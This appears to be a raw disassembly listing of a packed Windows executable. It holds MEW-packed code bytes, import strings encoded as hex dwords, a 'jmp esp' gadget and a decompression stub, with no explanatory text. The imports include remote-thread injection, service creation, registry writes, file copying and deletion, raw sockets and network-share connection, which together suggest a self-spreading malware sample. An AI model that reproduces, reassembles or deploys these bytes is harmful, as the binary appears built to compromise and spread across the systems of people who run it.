sub_40464E proc near ; CODE XREF: sub_4045CA+67�p
jmp dword_4010F0
sub_40464E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404654 proc near ; CODE XREF: sub_40443A+158�p
; sub_40443A+179�p
jmp dword_4010E8
sub_404654 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40465A proc near ; CODE XREF: sub_40443A+47�p
jmp dword_4010E4
sub_40465A endp
; ---------------------------------------------------------------------------
dd 529h dup(0)
dd offset dword_401044
dd 4E52454Bh, 32334C45h, 6C6C642Eh, 72578000h, 50657469h
dd 65636F72h, 654D7373h, 79726F6Dh, 69568000h, 61757472h
dd 6C6C416Ch, 7845636Fh, 75448000h, 63696C70h, 48657461h
dd 6C646E61h, 44800065h, 74656C65h, 6C694665h, 80004165h
dd 736F6C43h, 6E614865h, 656C64h, 69615780h, 726F4674h
dd 676E6953h, 624F656Ch, 7463656Ah, 65478000h, 6F725074h
dd 64644163h, 73736572h, 6F4C8000h, 694C6461h, 72617262h
dd 80004179h, 61657243h, 68546574h, 64616572h, 65478000h
dd 72754374h, 746E6572h, 65726854h, 64496461h, 736C8000h
dd 656C7274h, 8000416Eh, 61657243h, 65526574h, 65746F6Dh
dd 65726854h, 80006461h, 4C746547h, 6369676Fh, 72446C61h
dd 53657669h, 6E697274h, 417367h, 6E694680h, 6F6C4364h
dd 80006573h, 646E6946h, 7478654Eh, 656C6946h, 46800041h
dd 46646E69h, 74737269h, 656C6946h, 47800041h, 65547465h
dd 6946706Dh, 614E656Ch, 41656Dh, 6F6C4780h, 466C6162h
dd 656572h, 6F6C4780h, 416C6162h, 636F6C6Ch, 78458000h
dd 646E6170h, 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h
dd 417367h, 69725780h, 69466574h, 8000656Ch, 61657243h
dd 69466574h, 41656Ch, 74654780h, 72727543h, 50746E65h
dd 65636F72h, 80007373h, 57746547h, 6F646E69h, 69447377h
dd 74636572h, 4179726Fh, 6C5F8000h, 61657263h, 5F800074h
dd 6F6C636Ch, 80006573h, 61657243h, 72506574h, 7365636Fh
dd 80004173h, 7274736Ch, 41706D63h, 65478000h, 63695474h
dd 756F436Bh, 8000746Eh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 80004165h, 7274736Ch, 6E797063h, 47800041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 80004179h
dd 46746553h, 41656C69h, 69727474h, 65747562h, 80004173h
dd 79706F43h, 656C6946h, 43800041h, 74616572h, 74754D65h
dd 417865h, 74654780h, 7473614Ch, 6F727245h, 53800072h
dd 7065656Ch, 65478000h, 69724474h, 79546576h, 416570h
dd 69784580h, 6F725074h, 73736563h, 0FFFFFF00h, 4010F8FFh
dd 45535500h, 2E323352h, 6C6C64h, 61684380h, 70705572h
dd 417265h, 6E694680h, 6E695764h, 45776F64h, 80004178h
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 65538000h, 654D646Eh, 67617373h, 80004165h
dd 646E6946h, 646E6957h, 41776Fh, 74654780h, 756E654Dh
dd 73778000h, 6E697270h, 416674h, 0FFFFFFFFh, 401118h
dd 5F325357h, 642E3233h, 80006C6Ch, 53415357h, 656B636Fh
dd 4174h, 0B0000h, 0A0000h, 330000h, 160000h, 0C0000h
dd 30000h, 120000h, 50000h, 110000h, 0F0000h, 20000h, 720000h
dd 0
dd 80010000h, 49415357h, 6C74636Fh, 0
db 0Eh
align 4
db 8
align 10h
db 13h
align 4
db 9
align 4
db 7
align 4
db 14h
align 10h
db 96h ; –
db 3 dup(0FFh)
db 0FFh
align 2
dw 4010h
db 0
db 41h, 44h, 56h
db 41h ; A
db 50h, 49h, 33h
db 32h ; 2
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
aAstartservicec db '€StartServiceCtrlDispatcherA',0
aAopenscmanager db '€OpenSCManagerA',0
aAcloseserviceh db '€CloseServiceHandle',0
aAdeleteservice db '€DeleteService',0
aAsetservicesta db '€SetServiceStatus',0
aAregisterservi db '€RegisterServiceCtrlHandlerA',0
aAchangeservice db '€ChangeServiceConfigA',0
aAcontrolservic db '€ControlService',0
aAcreateservice db '€CreateServiceA',0
aAregclosekey db '€RegCloseKey',0
aAregsetvalueex db '€RegSetValueExA',0
aAregcreatekeya db '€RegCreateKeyA',0
aAsetsecurityin db '€SetSecurityInfo',0
aAchangeservi_0 db '€ChangeServiceConfig2A',0
aAstartservicea db '€StartServiceA',0
aAopenservicea db '€OpenServiceA',0
db 0FFh
db 3 dup(0FFh)
dd offset dword_4010F0
db 4Dh ; M
db 53h, 57h, 53h
db 4Fh ; O
db 43h, 4Bh, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
db 80h ; €
aTransmitfile db 'TransmitFile',0
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
jmp esp
; ---------------------------------------------------------------------------
db 10h
db 40h ; @
align 2
dw 504Dh
db 52h ; R
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
aAwnetaddconnec db '€WNetAddConnection2A',0
aAwnetcancelcon db '€WNetCancelConnection2A',0
aA db '€',0
align 10h
MEW ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003E52 ( 15954.)
; Section size in file : 00003E52 ( 15954.)
; Offset to raw data for section: 00006000
; Flags E00000E0: Text Data Bss Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
__u_____ segment para public 'CODE' use32
assume cs:__u_____
;org 406000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
loc_406000: ; DATA XREF: __u_____:00406018�o
xor ecx, ecx
inc ecx
loc_406003: ; CODE XREF: __u_____:00406009�j
call dword ptr [ebx]
adc ecx, ecx
call dword ptr [ebx]
jb short loc_406003
retn
; ---------------------------------------------------------------------------
dd 77E805D8h, 77E7A5FDh, 0
dd offset loc_406000
dd 40012Ch, 401C60h, 401180h, 0F701A5CEh, 0E0EB01F6h, 0BDF6FCFFh
dd 0F80E8E92h, 310D4FAh, 858DA780h, 0FC2B7FEEh, 3439DBC4h
dd 0B6A2FEDBh, 9D9B1880h, 0EE299CABh, 0C41902A2h, 0A7F89E21h
dd 9D831498h, 909D2B89h, 0F6FA0DF4h, 84C467FEh, 80A72981h
dd 0A146A115h, 81860E3Ch, 0C7129AAAh, 1DFD1EFEh, 8FC5BFDh
dd 0AFA0DACh, 98879990h, 0A180A110h, 408AFB51h, 9A64C3BDh
dd 7C002087h, 93A7A095h, 0B82354A7h, 4CC12720h, 9AA79B9Fh
dd 0AB952C40h, 0C5ADE4B6h, 2CE6F44Ch, 0BD88E70Ch, 0BCAF3FA6h
dd 0E37FAABAh, 3824D5D7h, 8CBDEC1Fh, 0CA9BBACh, 0BCBE0EADh
dd 0E047A3A1h, 18945FA2h, 0A80CBD3Eh, 9257B9BAh, 0A21CBE79h
dd 5CB7ADA7h, 0D00EA396h, 7F7A1742h, 0AAA03DB9h, 0BEEBF775h
dd 0A246CE3Eh, 0BA4E922Fh, 587322DBh, 0F92883DBh, 0F7CBCEABh
dd 8C0EACD6h, 0D34C871Fh, 0E8A31A3Bh, 2CD4A26h, 0FEAA1918h
dd 0A155A0BDh, 0E3BCFCB8h, 18B288EEh, 79A1A0F0h, 0B7A834BAh
dd 128A1961h, 0BB388AB8h, 14E82ABDh, 852D365Ah, 0CE8FA198h
dd 0BB377DBFh, 0EEB7836Ch, 0B7FD4CBEh, 0A9FF7982h, 0B93418A1h
dd 853092A5h, 4D54B710h, 0B78894C5h, 0A3377CFEh, 65FD6D92h
dd 8B3A1DDh, 3841A294h, 0AE40B44Ah, 0FEB4EC5Fh, 2FE9D31Ch
dd 74DF0228h, 0B5D07BFFh, 5C8B6D4Dh, 0C93E48AAh, 7B08B76Eh
dd 0EC9E20A0h, 0CD18A5CEh, 90681A28h, 22CEDB0Bh, 7CACCE7Ah
dd 952CAA6Dh, 0E43BFDEFh, 3599176h, 31A6E325h, 300A0364h
dd 3F0A760Ah, 74231E34h, 0A407310Ch, 26094CCEh, 600DA2E1h
dd 22BEB626h, 0E0249E37h, 100A54D4h, 880ADA8Ah, 0A60AA2A2h
dd 0B034B49Ch, 8F8DE249h, 3719945Bh, 0BEA130AAh, 64DEE0A7h
dd 21CF6200h, 0E94AA895h, 0BA44D492h, 0B5FBFC26h, 61FA0D32h
dd 0D5DCEB1h, 519206DAh, 968EBFFh, 0E4651806h, 0FD043C24h
dd 0EACDF4A0h, 3D207AA4h, 95BEABBAh, 18A3BB9Ah, 0BE6C070Fh
dd 690A5E0h, 832A0D84h, 8536078Ch, 0CB681EE1h, 0AC12F4F4h
dd 6ADF0364h, 9349102Bh, 14B04310h, 10F4E78Fh, 0BF9ADBF6h
dd 0DEB21EFh, 9CB4340Ah, 0A88A8226h, 0FFCA014h, 0A9AAAAFh
dd 8F9AC888h, 0F28C8F28h, 0E4A09E0Ah, 0B9878070h, 0E482C92Ch
dd 0A4CE9C8Bh, 6D1EC71h, 3B9790Ah, 81CC85C9h, 0E843DC9Eh
dd 83001F45h, 57E3BBA6h, 8D400BF0h, 3B0C93ECh, 87204CDDh
dd 0F2E4ED39h, 9ED959DEh, 18B9F1C1h, 0A0630FD2h, 168D9D8Fh
dd 389C660Dh, 0CCC0C8Ch, 90AA14F4h, 0D1BD7F36h, 0BBCB1050h
dd 91FAB0Dh, 285C540Ch, 0AF7DAD0Ch, 5FA428A5h, 2101AB4h
dd 1B54D610h, 591046C5h, 461FDBA5h, 0FA7A3472h, 5916D6E0h
dd 4BED2BC6h, 24C14118h, 0BE48BD8Fh, 2907874h, 209FE131h
dd 0D39D8191h, 1C9A93BCh, 0EDB37E47h, 0FE8AF95Ch, 319D14B9h
dd 4E61CAF5h, 43A16680h, 0E3872614h, 0A5BA8C89h, 2868FCDh
dd 508D585Ch, 0D49DBA58h, 9989098Ch, 73175688h, 8387481Bh
dd 0DDD79D62h, 0A0CDA9F4h, 48A809FEh, 241323C8h, 69024977h
dd 74EABCACh, 0EFE5DF64h, 306A8DE4h, 50E5A799h, 1180BA30h
dd 0B91C4070h, 1B380AE0h, 87080FE8h, 101C87F3h, 0C29D91Fh
dd 14209468h, 0CE320180h, 0C2FAE242h, 0ACBBC308h, 0E089A48Bh
dd 0AB9C64A6h, 36BA0ACFh, 5D886F20h, 0A9BE35B7h, 24958974h
dd 14A6A026h, 0F6BEED1Dh, 6146A79Ah, 0BDD7F791h, 2CE26009h
dd 98E326E9h, 0E4EF40E4h, 304D31E9h, 8E55A097h, 0BC398106h
dd 0B8BDADBEh, 6C08B2CEh, 4A148C62h, 0EE283299h, 0BAA368C1h
dd 9E5177E0h, 0AA5C60C1h, 14CD8198h, 0DE05E18Dh, 0B51D2216h
dd 0A948673Fh, 78D99DB5h, 4A6C1423h, 0F9A1AA16h, 0A24E9EEEh
dd 0F53D172Eh, 0AB2ED9B9h, 0BEBB1E3Ah, 76A3B77Eh, 0A851363Ah
dd 0B1D40EBFh, 0A25EB2BEh, 0C3F94A2Dh, 0DC5AB7E2h, 1F0813B6h
dd 3D8D9E9Ch, 82AC5DFDh, 87E6E08Fh, 0A76B2DA8h, 0EDE13B48h
dd 0BE8C0B19h, 0E2AAF9C7h, 0E28F2B56h, 0F7B2DDBBh, 0F99C4D84h
dd 0B94430ACh, 2CA8B6E7h, 455A8BFAh, 6B63AFFh, 608B3E18h
dd 0FECF47B6h, 0A168FDA5h, 0A261B4E3h, 41AF8709h, 6B4BAADEh
dd 0D9C366D7h, 19B794CAh, 13EBB1C8h, 0D31C419Ch, 0F63241D7h
dd 83D49006h, 591E4262h, 6BA8A837h, 0F49D112h, 62E4DEBCh
dd 258AB40Eh, 26A542CCh, 9DD9E837h, 9998039Bh, 0D6EAA245h
dd 0DCF28BA1h, 0B61FCB9Ah, 84581BCDh, 0F0EE9418h, 0FC2D1E13h
dd 7CFADF87h, 31FD3B07h, 620E3032h, 0BA070AF4h, 0C3010FC9h
dd 3C2536F0h, 0EAB206F5h, 482FBBDAh, 0B1A803EDh, 129085C2h
dd 0CA667ED2h, 0C0A80B54h, 93909152h, 8A374795h, 992E1EEAh
dd 1DDFC60Fh, 0C00A4D17h, 0FEA4900Dh, 0D7FAAA97h, 0C26795FEh
dd 0D587D206h, 4DC6B5A0h, 0F110DC22h, 22A69E60h, 1E473AECh
dd 244099DAh, 31264487h, 0C8A43A18h, 0CF7BB3Eh, 0CA8B471Eh
dd 44101524h, 166427EDh, 804001C2h, 0FD0022C0h, 7750A807h
dd 31FD9FD0h, 0D67A61F4h, 86B51263h, 451E5448h, 78C29D16h
dd 8629D6D7h, 0F016DE29h, 840872B7h, 14A0D640h, 5187E1C5h
dd 50CF7472h, 0D9C652CCh, 837602DFh, 4ECAE918h, 45B0AF3Ah
dd 0FFDEA40Ah, 52C6DA98h, 0BE20D46Ah, 9646CC09h, 0E06D6317h
dd 31B632E7h, 21846120h, 48872B1Ch, 83450FA1h, 0EC9F8FB9h
dd 4F12D69Bh, 3EC1320Ah, 92471245h, 6AFE7FE7h, 9B002F9Dh
dd 0B00E4BDEh, 199E64C4h, 25C202CAh, 0D614A52Bh, 8295BB01h
dd 7BB413D4h, 0DE51512Ch, 30562660h, 1E89C044h, 821149Ch
dd 1149AE2Eh, 0C5D4CBB4h, 11DE64CDh, 3E14A686h, 0F404EF76h
dd 106D00Ch, 4351808Eh, 0DFC06EF3h, 0C6A73F41h, 0CBFEF085h
dd 0CA1800D5h, 25444693h, 0DF07D206h, 5282651h, 0AE86DEE5h
dd 0E1485ECCh, 0C7C6F288h, 1F408AEAh, 99DF56F8h, 9C0803E8h
dd 52E81F3h, 0BF3F049Ah, 997369Dh, 658B7E14h, 34FE1D83h
dd 91011202h, 6CC92EF6h, 9A0EB220h, 0CA14040Ch, 0C5429B72h
dd 33DECA87h, 8FE36ABh, 91C21B0h, 0EC0C3A8Bh, 0E23E0F8Eh
dd 192680D2h, 1843FDCDh, 0E3DBF403h, 1E1E50DEh, 26CB1BBBh
dd 0C4AA69AAh, 28420588h, 0D073810h, 5E224F8Ch, 1266A651h
dd 0C805A465h, 0BA63025Ah, 1E1422FAh, 5379F337h, 0B126E9D0h
dd 139BD2C7h, 0A6DA064Fh, 38C65FCFh, 44C5DF86h, 0E6FDA638h
dd 591A1086h, 40202528h, 0D5201245h, 43B66270h, 992FCAA6h
dd 0C6170E26h, 0D8F9C52Ah, 43F7D8AEh, 3D48DE12h, 0A437769Ah
dd 3D7D19EEh, 10EFE721h, 65DA2E3Bh, 0AE630620h, 85B47FDFh
dd 4D890Fh, 2613B2CBh, 428CAAC2h, 0A39D2FE3h, 2AC58927h
dd 81FF0D16h, 9D13EABFh, 38FDE207h, 9D6CDCA4h, 227189CAh
dd 489A4800h, 9D991948h, 0F511F222h, 32393008h, 98B5BB14h
dd 9AA62901h, 78944C3Dh, 24BEDE52h, 34BD4CDCh, 2B085F36h
dd 0F34586EEh, 43130DFAh, 0B80E3E83h, 9522A647h, 9F123312h
dd 7F7E9E58h, 193E933Bh, 12063ABBh, 2A062E02h, 242F981Eh
dd 41E2A619h, 35124B43h, 0D3E2EC8Dh, 226C6ED5h, 0CF128472h
dd 63A3668h, 326D9244h, 701F054h, 3DA0F6DBh, 789548C2h
dd 1E704C7Fh, 62F2998Eh, 4522CA74h, 0B89B8836h, 0B3679945h
dd 22CD95FFh, 0FBE8EFC2h, 1B0FD2C6h, 269832A7h, 291C49Eh
dd 59350D12h, 3E082F34h, 6E4E8A76h, 8A1E320Eh, 8962938Ah
dd 1F20C526h, 0FEEB4DA8h, 100A19D2h, 8A1E13CBh, 0E2440A68h
dd 330D894Fh
dd 0A6D2063Ah, 8B20EDC4h, 0DA8C2276h, 22544690h, 9F262AFBh
dd 0FF3A449Eh, 0CDBC31A3h, 3BB05629h, 33501FF6h, 0C4C07D5h
dd 28D473CFh, 0CBE2C47Ah, 0D5A32606h, 85467633h, 0DC4EF1F7h
dd 0A8A0BB03h, 1DC8606Fh, 15526609h, 6DC52514h, 542E640Bh
dd 58FF9D4Eh, 0FB311B46h, 0AE1013A3h, 0FD00DFEAh, 0C10DF515h
dd 0D1A8264Ah, 426DD347h, 27F60C2Dh, 85C29445h, 7A3D87D4h
dd 90CF0DD2h, 4C41EE0Ah, 3A82A012h, 0EC58CA3h, 9EBB1695h
dd 80142432h, 44AB2AE6h, 0C6A481CAh, 63162A6h, 0DA726D9Eh
dd 3EBB3287h, 5813A238h, 0FB846656h, 0FE59CC72h, 304D25D4h
dd 0A49D0DFAh, 46A624C3h, 981AA10Bh, 0DE7A3818h, 29D6F389h
dd 5D0AE205h, 3FB25BA9h, 1E855ED2h, 15075F19h, 0DC2111BEh
dd 6D444D18h, 9D15CDB2h, 4622A158h, 0A332DC4Ch, 38889C9Ch
dd 77F3D19Eh, 0C048F6C8h, 6D32C920h, 986F210Ah, 9A164BA1h
dd 0D00EF621h, 0F22291D3h, 9126CE80h, 26DF68D4h, 1A113B9Dh
dd 5F09B269h, 19737105h, 0FB22120Bh, 9F5B605h, 8A894BC1h
dd 7732908Bh, 6E5FE10h, 0CB4A54C1h, 4095341Ah, 22DD689Fh
dd 41404BA8h, 31CF51C8h, 51524657h, 4653F623h, 682B406h
dd 0E6BA9548h, 8D43FEA2h, 659726B9h, 2260B0D3h, 0C1F0BA3Ah
dd 26D6461Fh, 0F1615769h, 82CC0E4Dh, 0BBD6F64Dh, 0AF85A816h
dd 0B5C88AC8h, 0C9DBA668h, 0B1DEAF27h, 2104E55Ah, 499E8E76h
dd 3CABBD11h, 29C6A026h, 44A37425h, 0FF34528Ah, 0CCED408Dh
dd 0C66F4A06h, 0A69B385Ch, 1176917Eh, 1F9E2E56h, 1D184273h
dd 0FAC8E442h, 80520793h, 0BA4538C0h, 0E0B0EAh, 0BBF4F04Eh
dd 0CF9043D5h, 9D1A49B8h, 60D74726h, 98384B36h, 0B3DB634Dh
dd 88F2E84Eh, 155D1370h, 0A1261463h, 4B36081Ah, 0CF350831h
dd 0E31AE998h, 893B97Eh, 8985D832h, 6ED21B31h, 5EB2E0E1h
dd 762289DCh, 81C28AA0h, 0D1EAC8BEh, 7827A180h, 22CF8BACh
dd 0EE3B8129h, 0B29115D1h, 0A69D096Ch, 96784802h, 2E6483C5h
dd 0FC584126h, 0A3582599h, 2C2C47A9h, 4211268Fh, 0D2BCCD50h
dd 40762E3Bh, 7B9BDA84h, 33845EB5h, 78779252h, 277498E9h
dd 382595A3h, 9E4D7312h, 5D26BD0Ah, 0EF446EC9h, 42228E4Dh
dd 11994C72h, 484E08DEh, 0EC7820F6h, 37C67644h, 0B5BF06C3h
dd 73D11FC0h, 6CC3344h, 0C80B3F27h, 8DA0072Ch, 192B69h
dd 0A62A259Fh, 505CAE16h, 8B4AA991h, 5C8487C5h, 908AE1C8h
dd 488CBA5Ah, 0EA9C4F88h, 7CCDFA62h, 0DB5BCF4Eh, 362B23D2h
dd 500E6DC1h, 98D9BBBBh, 3F32D5B3h, 9EC3CBD8h, 1952F76Eh
dd 684EA909h, 0C190260Fh, 0A6B8257Dh, 0A46B5C1Ah, 0F758A590h
dd 0AE92DEFAh, 70CD0C64h, 840AFD18h, 0EA427AC8h, 0E3AA4C07h
dd 81268691h, 9A9C98E4h, 7AA62A1Bh, 3A4593CBh, 0DEA232C8h
dd 209E25BCh, 0DE51BEACh, 0AE0109E2h, 0E44498C6h, 40E70C1h
dd 0C6AF374Dh, 0A1C79C41h, 1E16FA38h, 1EEB8741h, 0CEA4BAE3h
dd 95AF8D27h, 68019DEh, 4B2884DFh, 2602CCBDh, 4049DB5Eh
dd 4E1580A7h, 0BBEECFB6h, 9EA631FAh, 281CFDE1h, 269C8E79h
dd 9A08E6A4h, 0F79EF242h, 94620A20h, 116A653h, 0FAA6C9BBh
dd 25148ED9h, 0FE6ECCBh, 4728F326h, 0C8F83275h, 0E62FEB89h
dd 5315DF01h, 0C46F4ED5h, 0A6816AD1h, 22180C14h, 828281CDh
dd 0EC5A9643h, 0BACBC55Fh, 258861F1h, 0C2EE11CFh, 154A2F13h
dd 0F4B8451Bh, 36A76952h, 43268574h, 0B8256DB1h, 0C3626518h
dd 0CC864415h, 0C8B8D141h, 40FF438h, 0E79DD3BAh, 2FE0CF96h
dd 1717CCCAh, 2BF254Eh, 353EFB37h, 648E8802h, 0BB040F39h
dd 169D952Bh, 138810C2h, 1A5A4615h, 64749D40h, 5EA8A130h
dd 85CB2C8Ah, 0C85A9295h, 88BFA19Ch, 8A9FD627h, 0A23724A2h
dd 406F114Ch, 38865FC5h, 87A8BAADh, 0D06AFAC3h, 9137CD1Bh
dd 4A8DF516h, 0E442D4D1h, 8D64DEh, 59D61630h, 34A590D9h
dd 3695C9D0h, 3510CF90h, 0B41A8F3Ch, 0D81BC47Eh, 421D084Dh
dd 7225DD47h, 147C2272h, 6A89047Ch, 0CA440308h, 199BA654h
dd 0A9DBAA0h, 52F3D5CDh, 0A4A2EB95h, 38984A4Bh, 392B0BBh
dd 0BC07FD3Dh, 5AC18C34h, 0C49F7F0Fh, 5C37780h, 1D48A925h
dd 3254A2AFh, 9D29C71Ch, 11518319h, 8C10C901h, 0D255FB45h
dd 78D668A7h, 28240A4Bh, 9E3E1EA0h, 0E26CC2Ah, 0C5F32487h
dd 0DAF269CAh, 281F6EC1h, 990274Bh, 0FAB63177h, 0C4D2EE3Ch
dd 6836C616h, 7E8328FFh, 0C8FCCAF8h, 36BB471Ch, 83A93C6h
dd 46CC3B22h, 220223A7h, 4C2FC620h, 0CD3C093Eh, 97D35296h
dd 6D33FEE1h, 720D64E2h, 0F65A8732h, 7791DBD7h, 86272A26h
dd 9C1DE20Dh, 58E6116Ah, 1BEE34C7h, 9E18AFE4h, 61EA45B4h
dd 0BD63632h, 0EEB9206Fh, 5806B19Eh, 0A1DD62Ah, 48022113h
dd 1A5ED13Fh, 0C3BE3A23h, 0BE8A1391h, 8252743Fh, 17FAE27Eh
dd 0A813EE14h, 3EC285C6h, 8A6597D9h, 5EA4D97Ah, 0A72C6A53h
dd 4B8B5F18h, 0E42D2902h, 6E85A9B2h, 82BF125Dh, 220C0DC5h
dd 9410D0E2h, 6A2564DFh, 0D066B798h, 0AB21665h, 9DEC272Fh
dd 0CE356E1Bh, 0D9EBA618h, 8B203667h, 0CF891E50h, 0D265419Ah
dd 1239D1Fh, 0CA7636A4h, 0D65B2908h, 8C2D5079h, 52339FCEh
dd 82296454h, 312B1222h, 16F438D4h, 0E96516Fh, 129827EEh
dd 18689B6Dh, 81A49A6Fh, 0AF1D8A64h, 922F9E22h, 7717C61Bh
dd 0F3478822h, 320DBF6Bh, 985741FBh, 70D27125h, 114E82BDh
dd 490982B3h, 8EA4A784h, 0E8F6AB27h, 0D09E6D1Fh, 0D59E2363h
dd 86223C92h, 8AD34514h, 0FAA40F5Ah, 0DA29DAA6h, 0EC238480h
dd 0D280DE1Dh, 0C24E3498h, 3F1FA62h, 8B1A9E15h, 0D065C498h
dd 0DBC5100Ah, 9D4214BEh, 145E544h, 4BC6EA82h, 0E0D8B807h
dd 0B2F6991Fh, 0EFD16C0h, 3FCC270Fh, 407653Dh, 72CD2F4Dh
dd 5CCA9164h, 44E82118h, 0C23A8A78h, 5016B79Dh, 2A1F3595h
dd 0F0D833Ch, 43A8DE2Eh, 95C1300Ch, 3CCEC20Ch, 384B817Fh
dd 3A47DDB8h, 1EE56DCCh, 40DA440Fh, 808FDF46h, 906C39BBh
dd 1CA2741h, 74AC644h, 0BBF4C7BAh, 8ECB0643h, 9BEC3F25h
dd 750625C5h, 33B07E9Dh, 4418C2C3h, 46440DC0h, 1196C583h
dd 89F4D22Bh, 3DABB16h, 0FB30E5D3h, 0C11F3BC4h, 8CD9D203h
dd 3CC317F4h, 107C5064h, 9331C811h, 2366A685h, 46AE2525h
dd 57DC58A7h, 9427997Fh, 0CC8F1092h, 4D0D2E40h, 29C37AF3h
dd 5187BBCFh, 0CCBFC3CEh, 0AF37AA37h, 0E1C67562h, 72FFCA44h
dd 47287E40h, 97BC23FBh, 73CFA685h, 6F0C1251h, 0DA0CD53Ch
dd 0A0C1B30h, 0CB090DF1h, 3A24AF53h, 0A629D29Fh, 0C03C3611h
dd 6F0BFDCFh, 3C4C489h, 45C9BB09h, 252F2009h, 107FDC0h
dd 78C12644h, 0F906C50Ah, 0D145F92Fh, 0CC492B77h, 0C206004Bh
dd 9209C4BBh, 201AD816h, 2BDAC325h, 460F1312h, 127AB120h
dd 89D96BBh, 25A81AF7h, 0ED982709h, 0A6621126h, 127BED6Dh
dd 53BC539h, 237043DEh, 0BDE1F580h, 3206F3D8h, 0E12698D6h
dd 20A65B85h, 84D1D43h, 2825EE14h, 550CA996h, 15764EBAh
dd 97273DF4h, 0A866F839h, 8B24D267h, 15871DC2h, 36850999h
dd 5347D520h, 0BBE1B692h, 5C339610h, 0CC2E113Eh, 972C4A76h
dd 433A30F2h, 2ADCAE73h, 0D4C24FA0h, 97CFB9D6h, 6CD87984h
dd 9C6B036h, 4ECAA8B0h, 28F95006h, 4328AA42h, 0F5DEC149h
dd 0ECDCB805h, 19C0AE5Bh, 0C6BAFCF7h, 0FA4D608Eh, 3ABC0FF5h
dd 0DCBB08C7h, 0BDE037B7h
dd 517A47C3h, 0B5CB1C4Bh, 5B452E06h, 1D3489EEh, 19C58016h
dd 3408FFF7h, 740C110Fh, 0A0193489h, 2E803438h, 1897DEA4h
dd 7D094D19h, 0C28306CAh, 33AA4BC1h, 2AA63CA1h, 0B1384F4Ah
dd 0CD6622C9h, 1D186108h, 842AC842h, 6A92EA7h, 246F925h
dd 6169886Eh, 10B2EE30h, 2960392Eh, 59A4747Eh, 962173B6h
dd 39D7FABBh, 24329B8Ch, 78037B43h, 994FF045h, 0B34D5531h
dd 53BA9460h, 99052EECh, 0B5DBEA26h, 9C02116h, 0DD239148h
dd 0C04DCD83h, 27A184FCh, 280AB5A7h, 0F1494D9Dh, 0A0A245C4h
dd 0E5D0A4C8h, 0E24750A6h, 81DC8A4Bh, 0C6D28BAAh, 0AD1499B2h
dd 2DAA75E1h, 0AA5D9604h, 4484B35Eh, 0EDC24AC9h, 4346C8ACh
dd 0A80F9781h, 0D7E4F2E7h, 44F147FEh, 360483EBh, 377C6D48h
dd 1EC6A90Eh, 3AC85C10h, 17C29B1Bh, 6F5FA01h, 8988E4BBh
dd 25E804EFh, 0C3F04ED5h, 3CBAD016h, 26E92DEBh, 218E4965h
dd 1483104h, 4088C715h, 257CBB57h, 748EC248h, 3CEAC148h
dd 0C5C4B696h, 0C8F63E18h, 527F5AACh, 0CFEE4446h, 0BC85CC82h
dd 503244C0h, 7BD663DBh, 33134B36h, 2C4198D9h, 0A6FD600Dh
dd 1DFC9136h, 6ED782D8h, 26F755B1h, 0E30A0C31h, 90202504h
dd 519CCA07h, 0E6B1B7B3h, 6111A675h, 5E268542h, 680973A0h
dd 901324C8h, 0F6702632h, 46A79E46h, 0F5F000BAh, 4EF4B908h
dd 211BA373h, 0BA0C7B44h, 8A163DE5h, 0BBCDDB01h, 8DA159C3h
dd 87D72662h, 18A23391h, 43A3B24Eh, 0BB0AC5BAh, 81E0101Bh
dd 3CCB8EE1h, 88CD965Fh, 0C50EDC0Ch, 0CC26A69Fh, 45091964h
dd 6CDE4EFBh, 9E0E44A6h, 32CA1EA4h, 45F01018h, 0B44D5016h
dd 754A36C1h, 7E4568E1h, 4D21A5DAh, 0EBF21DC3h, 224F31BBh
dd 522AA61Bh, 0C1A51855h, 2E1232B7h, 43A94616h, 0A6894452h
dd 65831E56h, 1462DEFAh, 861A41C2h, 0F525118Ah, 26256C2Ch
dd 0CF331224h, 40E94A6Fh, 76183451h, 7A29368Dh, 8E3FB620h
dd 119B94B9h, 431A6BB2h, 1F5F64C1h, 743852B6h, 90FEE44Dh
dd 0EEA43116h, 0A6ED2691h, 0C125FA79h, 57023DB5h, 0EE5812E4h
dd 3312303Dh, 0B488D046h, 23E9CBD4h, 707833h, 0B5BA0DF5h
dd 0B48ED646h, 0F6320784h, 0C4D3B4D0h, 0C248C384h, 0B72F1FE1h
dd 80491220h, 244DD89Ah, 28CDF6FEh, 0C0F8804h, 7FD1125h
dd 0F60A160Eh, 23DBBAD6h, 0DF4219B6h, 0DF820694h, 252E171Eh
dd 3D4FAE29h, 0FCD21A1Bh, 0F1072BCh, 1ECC7EFAh, 5ED33693h
dd 2C04127Eh, 0F769C159h, 56561E26h, 91ABD3Fh, 0B9EC4ACBh
dd 162FE1A6h, 0D2F692CCh, 0C7C55043h, 448FB097h, 6B393DF6h
dd 520F5BA8h, 8BD074A6h, 47E082CDh, 0B8E2ECFEh, 0C6EECAD4h
dd 6BB718E8h, 24E8343h, 23AB6797h, 0DCBB47AFh, 202645D4h
dd 1992423Ah, 9E8F8A4Bh, 100D352Bh, 7A02A9FDh, 1CAB4DA8h
dd 0E66B4BE4h, 1E528431h, 1A936E18h, 1E6CB7BCh, 25FE9C7Ah
dd 44891AECh, 298214D6h, 33FE2A7Ah, 0BF67075h, 36240C60h
dd 0E4768B08h, 0D629050Fh, 20E273FDh, 0E6CE7447h, 0CF720DCAh
dd 4E0E3231h, 0C80F088Ch, 6B0CFB5Eh, 165B22E9h, 0E9CC5D23h
dd 0EE3CCA48h, 0F7A87E89h, 1ECC0E44h, 64222C26h, 0A2205F9Eh
dd 93C33CEh, 7F24113Eh, 0FA7C2EC8h, 6678D20h, 0B3626206h
dd 0AC66050Ah, 0F3182C1Ch, 377B283Ah, 0DF104996h, 0B72C5966h
dd 104C2A24h, 2E1BC299h, 0A466D242h, 452BECDh, 5836CF38h
dd 0C8DAA426h, 2162B225h, 0A51E2839h, 0CF9A8168h, 42692083h
